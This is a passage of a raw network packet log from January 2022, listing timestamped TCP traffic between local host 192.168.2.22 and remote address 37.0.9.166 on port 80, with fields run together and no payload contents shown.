                                                          Jan 14, 2022 10:23:18.079375982 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079396009 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079444885 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079463005 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079480886 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079490900 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079498053 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079509974 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079521894 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079539061 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079629898 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079648972 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079665899 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079669952 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079684019 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079700947 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.080002069 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.080121994 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.080208063 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105067968 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105097055 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105109930 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105129004 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105166912 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105179071 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105194092 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105212927 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105228901 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105238914 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105242968 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105245113 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105247974 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105262995 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105281115 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105292082 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105297089 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105303049 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105315924 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105320930 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105334044 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105336905 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105351925 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105364084 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105369091 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105385065 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.106420040 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.106692076 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106714010 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106725931 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106739998 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106759071 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106775045 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106792927 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106811047 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106831074 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106848001 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106865883 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106884956 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106903076 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106904030 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.106920004 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106937885 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106956005 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106972933 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106988907 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.106990099 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107007980 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107026100 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107064962 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107069969 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107076883 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107094049 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107103109 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107109070 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107115984 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107125044 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107139111 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107142925 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107153893 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107162952 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107172966 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107182980 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107194901 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107202053 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107207060 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107220888 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107232094 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107238054 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107247114 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107256889 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107274055 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107290030 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107299089 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107306004 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107307911 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107311010 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107331991 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107342958 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.110883951 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.132081032 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.132114887 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.132132053 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.132148981 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.132173061 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.132191896 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.132216930 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.132241964 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.132275105 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.132328987 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.132339954 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.132350922 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.132359028 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.132366896 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.133119106 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.133143902 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.133161068 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.133192062 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.133218050 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.133230925 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.133232117 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.133258104 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.133259058 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.133269072 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.133327961 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.133945942 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.133971930 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.133996010 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134017944 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134041071 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134064913 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134088993 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134104967 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134114027 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134121895 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134126902 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134139061 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134171009 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134187937 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134212971 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134238958 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134263039 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134289980 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134357929 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134363890 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134366989 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134371042 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134375095 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134377956 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.146228075 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.488502026 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.516453981 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.516546965 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.518182993 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.544800997 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.545969963 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.545994043 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546013117 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546030998 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546062946 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.546134949 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546153069 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546170950 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546184063 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.546189070 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546211004 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.546273947 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546291113 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546314955 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574367046 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574400902 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574424982 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574435949 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574444056 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574464083 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574465036 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574486971 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574503899 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574505091 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574521065 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574538946 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574548960 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574585915 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574610949 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574630022 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574646950 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574668884 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574723959 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574744940 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574763060 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574770927 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574779987 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574804068 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574925900 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574943066 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574986935 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601250887 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601294994 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601313114 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601330996 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601349115 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601367950 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601373911 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601389885 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601393938 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601412058 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601429939 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601536036 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601588964 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601588964 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601605892 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601656914 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601691008 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601735115 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601757050 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601778030 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601788998 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601794004 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601826906 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601829052 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601883888 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601897001 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601933002 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601957083 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601974010 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.602005959 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602025032 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602054119 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602055073 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.602075100 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602094889 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.602189064 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602247000 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602247000 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.602292061 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602315903 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602333069 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.602380037 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602401972 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602426052 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602430105 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.602475882 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602577925 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.602596998 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602626085 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602650881 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602664948 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.602683067 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602730989 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.602731943 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602818966 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602860928 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.629296064 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629328012 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629347086 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629364967 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629383087 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629400969 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629419088 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629426003 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.629436970 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629451990 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.629456043 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629473925 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629478931 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.629492044 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629511118 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629519939 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.629528999 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629550934 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.629601955 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629621029 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629645109 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.629661083 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629703045 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.629738092 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629806995 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629823923 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629877090 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629888058 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.629903078 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629914999 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.629923105 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629941940 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629966021 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.629975080 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.629993916 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630012989 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630023003 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.630038977 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630059004 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630069971 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.630076885 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630096912 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630098104 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.630115032 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630131960 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630131960 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.630148888 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630167007 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.630227089 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630254984 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630265951 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.630271912 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630290031 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630316973 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.630319118 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630335093 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630352020 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630364895 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.630368948 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630393028 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.630397081 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630415916 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630433083 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630436897 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.630450010 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630470037 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.630476952 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.630511045 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.630551100 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630569935 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630588055 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630605936 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.630609035 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.630640030 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.656254053 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.656301022 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.656327009 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.656352043 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.656358004 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.656375885 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.656388998 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.656400919 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.656424999 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.656440973 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.656451941 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.656477928 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.656497002 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.656497002 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.656512976 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.656529903 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.656537056 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.656543970 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.656563044 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.656568050 CET4916880192.168.2.2237.0.9.166
